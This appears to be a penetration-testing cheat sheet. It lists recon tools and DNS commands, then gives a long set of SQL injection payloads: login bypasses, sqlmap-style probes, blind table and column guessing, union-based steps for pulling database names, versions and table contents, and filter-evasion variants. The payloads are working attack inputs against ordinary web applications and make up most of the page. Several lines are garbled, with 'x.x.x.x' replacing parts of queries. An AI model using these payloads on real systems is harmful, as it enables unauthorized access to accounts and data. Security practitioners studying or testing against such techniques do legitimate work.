Skip to content

Enumeration

//tools//

  • dirbuster / dirb
    • Web spidering, useful for finding hidden directories and files.
  • nmap
    • Most versatile tool for basic enumeration, capable of TCP/UDP port scanning, firewall evasion, OS fingerprinting and more. Loud, easily identifiable in web traffic.
  • nikto
    • Automated web server scanner. Not designed with stealth in mind.
  • WPScan
    • Robust tool for scanning web pages built with Web Press, useful for enumerating usernames.
//Bash tools//

//Python tools/

//Google Magic//

//DNS//

  • Perform a Whois Query
    • whois domainname.com
  • DNS IP lookup
    • dig -a domainname.com
  • MX Record lookup
    • dig -mx domainname.com @nameserver
  • Zone transfer
    • dig -axfr domainname.com @nameserver
  • Netcat banner grab

// HTTP //

CEWL – Custom wordlist generator, scrapes website, creates wordlist for password guessing.
cewl -a -v <url>
cewl -d <0-4> <url> -w <save.txt>
cewl -m 4 -d 5 http://<target ip>

// SQL //

Login bypass

meh’ OR 3=3;#
meh’ OR 2=2 LIMIT 1;#
meh’ OR ‘a’=’a
meh’ OR 1=1 –+


param=’
param=”
param=’ or 1=1
param=’ or 1=0
param=’ and 1=1
‘ or sleep(2) and 1=1#
‘ or sleep(2)#
admin’ and sleep(2)#
‘ union select sleep(2),null#
‘ union select sleep(2),null,null,null,null#
param=’ or 1=1#
param=’ or 1=1
param=’ or 1=1 //
param= or 1=1#
param=and or 1=1#
param=’ or 1=1

This is the most classic, standard first test:


‘ or ‘1’=’1

Then you have:
-‘
‘ ‘
‘&’
‘^’
‘*’
‘ or ”-‘
‘ or ” ‘
‘ or ”&’
‘ or ”^’
‘ or ”*’
“-“
” “
“&”
“^”
“*”
” or “”-“
” or “” “
” or “”&”
” or “”^”
” or “”*”
or true–
” or true–
‘ or true–
“) or true–
‘) or true–
‘ or ‘x’=’x
‘) or (‘x’)=(‘x
‘)) or ((‘x’))=((‘x
” or “x”=”x
“) or (“x”)=(“x
“)) or ((“x”))=((“x

If above queries don’t work try with these sqlmap payoads:

‘.)))(“),.
‘ghwshP<‘”>CZuifw
)+AND+4287=8913+AND+(7303=7303
)+AND+8680=8680+AND+(6351=6351
+AND+4573=5119
+AND+8680=8680
‘)+AND+9284=3986+AND+(‘ndfW’=’ndfW
‘)+AND+8680=8680+AND+(‘juwu’=’juwu
+AND+2138=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(x.x.x.x
‘)+AND+2138=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(x.x.x.x
(SELECT+3273+FROM(SELECT+COUNT(*),CONCAT(0x716a6a7671,(SELECT+(ELT(3273=3273,1))),0x716b717071,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)
(SELECT+CONCAT(0x716a6a7671,(SELECT+(ELT(6967=6967,1))),0x716b717071))
+AND+4920=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(x.x.x.x
)+AND+7244=4397+AND+(3968=3968
)+AND+6379=6379+AND+(1483=1483
‘)+AND+2572=3816+AND+(‘alWa’=’alWa
‘)+AND+6379=6379+AND+(‘mxeB’=’mxeB
)+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–+tsVj
+ORDER+BY+1–+UCdp
+UNION+ALL+SELECT+NULL–+UzBg
+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–+ISdf
‘)+ORDER+BY+8048–+qQkS
‘)+UNION+ALL+SELECT+NULL–+TFas
‘)+UNION+ALL+SELECT+NULL,NULL–+EZcP
%’+ORDER+BY+1–+NSgg
%’+ORDER+BY+7605–+dZkK
%’+UNION+ALL+SELECT+NULL–+JQPp
%’+UNION+ALL+SELECT+NULL,NULL–+VtSC
+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–+Lbrh
‘ UNION ALL SELECT NULL,NULL,CONCAT(0x716b6b6271,IFNULL(CAST(table_name AS CHAR),0x20),0x7162627671),NULL,NULL FROM INFORMATION_SCHEMA.TABLES– sd

If nothing works try these Blind sql payloads:

‘ AND (select 1)=1
Guessing Table name:
‘ AND (select 1 from admin limit 0,1)=1
‘ AND (select 1 from users limit 0,1)=1

Guessing Columns:

‘ AND (select substring(concat(1,pass),1,1) from users limit 0,1)=1
‘ AND (select substring(concat(1,password),1,1) from users limit 0,1)=

Now determine number of columns in the current table

param=’ or 1=1 order by 1#

param=’ or 1=1 order by x.x.x.x

let say there are 3 columns

Now determine vulnerable columns or column which is visible

param=’ or 1=0 union select null,null,null# –> if it produces no error then try

param=’ or 1=0 union select 1,2,3# –> check which number shows in web page

Else try

param=’ or 1=1 union select table_name,null,null from information_schema.tables#

if it produces error try table_name at other positions

Now, lets say column 1,2 are shown in web page

To futher enumerate

param=’ or 1=0 union select table_schema,null,null from information_schema.columns# –> display all database name

Note 1=0 in above query to show only databases

param=’ or 1=0 union select version(),null,null from information_schema.columns# –> retrieve version

param=’ or 1=0 union select @@version,null,null from information_schema.columns# –> retrieve version in mssql

param=’ or 1=0 union select substring(version(),1,1)=1,null,null from information_schema.columns# –> return true if version is 1.x.x

param=’ or 1=0 union select substring(version(),1,1)=5,null,null from information_schema.columns# –> return true if version is 5.x.x

param=’ or 1=0 union select substring(version(),3,1)=2,null,null from information_schema.columns# –> return true if version is 5.2.x

param=’ or 1=0 union select table_name,null,null from information_schema.columns# –> display all table name

param=’ or 1=1 select table_name,null,null from information_schema.columns where table_schema=’public’# –> display tables inside public database

param=’ or 1=1 select column_name,null,null from information_schema.columns where table_schema=’public’ and table_name=’info’# –> display all columns of info table

param=’ or 1=1 select table_name as table,column_name as column,null from information_schema.columns#

Let say the database name is public and table name is info

Let the table info has two columns id and name

param=’ or 1=0 union select id,null,null from public.info# –> display id column from table “info”

param=’ or 1=0 union select id,name,null from public.info# –> display id and name column from table “info”

param=’ or 1=0 union select id,name,null from public.info where id=’papa’# –> display id and name of ‘papa’

BYPASSING filters

we can use case switching or commenting to bypass normal filters such as union, select

param=’ or 1=0 UniOn selEct id,null,null FroM public.info#

param=’ or 1=0 un//ion sele//ct id,null,null fr/**/om public.info# works in mssql